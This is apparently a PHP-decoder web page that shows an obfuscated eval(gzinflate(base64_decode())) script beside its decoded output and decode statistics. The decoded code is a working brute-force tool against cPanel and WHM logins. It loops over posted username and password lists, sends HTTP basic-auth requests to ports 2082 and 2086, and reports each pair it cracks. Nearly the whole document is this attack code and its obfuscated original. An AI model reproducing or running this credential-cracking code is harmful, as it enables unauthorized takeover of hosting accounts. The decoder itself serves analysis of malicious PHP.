Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $X= 'LyogLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0..

Decoded Output download

error_reporting(0);
$connect_timeout=5;
set_time_limit(0);

$userl=$_POST['usernames'];
$passl=$_POST['passwords'];
$attack=$_POST['op'];
$target = "localhost";

if(isset($_POST['cpanelcracking']))
{
if($userl!=="" && $passl!=="")
{
if($_POST["op"]=="cp")
{
$cracked=$_POST['crack'];
@fopen($cracked,'a');
echo "khlass ani n attacki fe les cp astenna chwiya
";


}
elseif($_POST["op"]=="whm")
{
@fopen($cracked,'a');
echo "Ana njibou fe les whm Panels 3and?k el zhar stenaaa :p";

}

function cpanel($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 0 ){
echo "<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";


}

curl_close($ch);}

$userlist=explode("
",$userl);
$passlist=explode("
",$passl);

if ($attack == "cp")
{
foreach ($userlist as $user) {
echo "<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>Attacking user $user </font></td></tr></table>";
$finaluser = trim($user);
foreach ($passlist as $password ) {
$finalpass = trim($password);


cpanel($target,$finaluser,$finalpass,$connect_timeout);

}
}

}

function whm($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2086");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 0 ){
echo "<table width=100% ><tr><td align=center><b>
<font color=white size=2>:D 3andek Zhar==================================</font>
<font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass 
</font> <font color=white size=2>==================================</font></b></td></tr></table>";




}


curl_close($ch);}
$userlist=explode("
",$userl);
$passlist=explode("
",$passl);

if ($attack == "whm")
{
foreach ($userlist as $user) {
echo "<table width=80% ><tr><td align=center><b><font color=white size=2>user under attack is $user </font></td></tr></table>";
$finaluser = trim($user);
foreach ($passlist as $password ) {
$finalpass = trim($password);

whm($target,$finaluser,$finalpass,$connect_timeout);
}
}
}
}
elseif($userl=="")
{
echo "wach rak tdir  :( , you have left userlist field empty";

}
elseif($passl=="")
{

echo "el security 9wiya :'( ...";
}
}

Did this file decode correctly?

Original Code

<?php $X= 'LyogLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgkJCQkJCUF1dGhvcjogICAgIEFiZHVsIFJhaG1hbiBTaGVyemFkICh3d3cuYWZnaGFuY3liZXJzb2Z0LmNvbSkKCQkJCQkJRW1haWw6CQlpbmZvQGFmZ2hhbmN5YmVyc29mdC5jb20KCQkJCQkJQmlvZ3JhcGh5OglBYmR1bCBSYWhtYW4gU2hlcnphZCB3YXMgYm9ybiBhbmQgYnJvdWdodCB1cCBpbiBIZXJhdC1BZmdoYW5pc3RhbiBhbmQgY29tcGxldGVkIG15IHVuZGVyLWdyYWR1YXRlIHN0dWRpZXMgaW4gQ29tcHV0ZXIgU2NpZW5jZSBGYWN1bHR5IG9mIEhlcmF0IFVuaXZlcnNpdHkgaW4gMjAwNiBvYnRhaW5pbmcgbXkgQi5DLlMgZGVncmVlIGFzIHRoZSBiZXN0IG91dGdvaW5nIHNlbmlvciBzdHVkZW50IGZyb20gdGhpcyBmYWN1bHR5LgoKCQkJCQkJCQkJSGF2aW5nIGludGVsbGVjdHVhbGl0eSBpbiBDb21wdXRlciBQcm9ncmFtbWluZyBhbmQgSW5mb3JtYXRpb24gRGF0YWJhc2UgTWFuYWdlbWVudCBTeXN0ZW0sIEkgd2FzIG9mZmVyZWQgdG8gY29tbWVuY2UgdGVhY2hpbmcgaW4gQ29tcHV0ZXIgU2NpZW5jZSBGYWN1bHR5IG9mIEhlcmF0IFVuaXZlcnNpdHkuIEFmdGVyIGEgd2hpbGUgSSBqb2luZWQgQ1JTIHRvIHdvcmsgYXMgdGhlIERhdGFiYXNlIE1hbmFnZXIgZm9yIHRoZSBBREEgcHJvZ3JhbS4gSSB3b3JrZWQgZm9yIENSUyBmb3IgYSBjb3VwbGUgb2YgeWVhcnMgYWZ0ZXIgd2hpY2ggSSB3YXMgYXdhcmRlZCBhIHNjaG9sYXJzaGlwIGJ5IHRoZSBnb3Zlcm5tZW50IG9mIEdlcm1hbnkgdG8gcHVyc3VlIG15IE1hc3RlciBpbiBJbmZvcm1hdGlvbiBEYXRhYmFzZSBNYW5hZ2VtZW50IGFuZCBTb2Z0d2FyZSBFbmdpbmVlcmluZyBpbiBCZXJsaW4gYXQgVFUtQmVybGluIFVuaXZlcnNpdHkuCgoJCQkJCQkJCQlJIGFtIGN1cnJlbnRseSBhbHNvIHRlYWNoaW5nIGF0IHRoZSBIZXJhdCBVbml2ZXJzaXR5IGFzIHdlbGwgYXMgYWN0aW5nIGFzIHRoZSBoZWFkIG9mIEluZm9ybWF0aW9uIFN5c3RlbXMgTWFuYWdlciBib3RoIGluIENSUyBhbmQgSGVyYXQgVW5pdmVyc2l0eSB0byBzdXBwb3J0IHRoZSBlZHVjYXRpb25hbCBuZWVkcy4KCQkJCQkJCQktLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0gKi8='; eval(gzinflate(base64_decode('7VZrbxM5FP1eqf/hMgpkRho1aVcgCJ3shjaISpBE6VRILFXkejwdbxx75HEIZZX/jh/zaNoSyooiPmyVTmL7Po7Ptc9cIqWQM0lyIRXll343eLm708KCc4LVTNEFEUsVPdWTBXHjGaMLqpyhNl0WRLKoNZuMT+O/22bE0YIU7XMTJ0dF0Sya0UrIpFxESiE8r1dF7qYVkpdEQQQeExixTBTKs6lo6tNCo/ArD5wjThiWOoqG3j4Pgt2df62dQ/UoijwPnjwBh8MOGxMXxBO5d64XcF4utWw8ktS47NhC+ysVOeF+ZRG2UduQQHAmwJtnTCcBxClwcFujkBJgpACcAyoU4RwBzlb0Cn3kbku7O2vtzwpyG9AqW5SItqYd6Jj8H3ohllUy7QgTQ0wBfyCe/DkHwuBLhiQYCAgh6OUu+9o80iXHigoOjk2/ZQgPLYGh5S1slacgsOxkujJ4KdmMcn0KDBA70nURuS4NzkI4Opu+HU/imf4KwcuUynudjo3bO+g+P/C2Ok2H8dl0FE8Ho9PXw2kI+1ut38TxZHAWv3Ez5tfs1eD05Gg7rtPhdPL+WGOz2+zZbd5EBZs+R+PRaHgUxyfvhuOzOISalG2JXg9O3o5Hw+l0XG2klSCFKgbJZ4KNg1mgKfjlrJRc2GmIIuiCod3V+lChC0ZgRROVRfvd7mPoHyqp/xNAjF7yCBOuiJ646B+mgivAggkZrTKqCBT0C4kO+tF3/w47xncjgiRJ5Q+WMrjDaCNNeVY1VpXB9yIa+isj+AnIO3r/HZWYhzQPw1r/2oUrK4aZKIjjf91IGS1URD7nTCTE9/Q9dVeBBbWc3Taw00GpUfrcuNtvqtfISiokQfry+HUWLQmOzACaCif0041aXq/58/uWvKZ3vz9wUsQvwRZus3x3stRKKUfM2kWgJF04zGaDzS4qKuwuKmEHuxXnb4ta+VcGQVmESmuc1odNxrBxDm++hYJKtNa3xUuL3sMr17P/levhlWt355sK0Du2bzQyhw/6dXZvPdiM+Cu0TGf8RWpW34Q7Ne0hFK3pS+4paf9JwDa4slVa6sLLsrECWvwWQmZV54c1bH3tU/V+rouu+1NH3coglGgOKqESoOdDCFe60cvQJ9PqpQpq4lNKWAJkkaururerYrsmvI5dRdddYUH0oaHqCl6YphR6bR/29va8GuNX')));?>

Function Calls

gzinflate 1
base64_decode 1

Variables

$X LyogLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t..

Stats

MD5 bdb5e38d6c5ce994824c743b3878b079
Eval Count 1
Decode Time 107 ms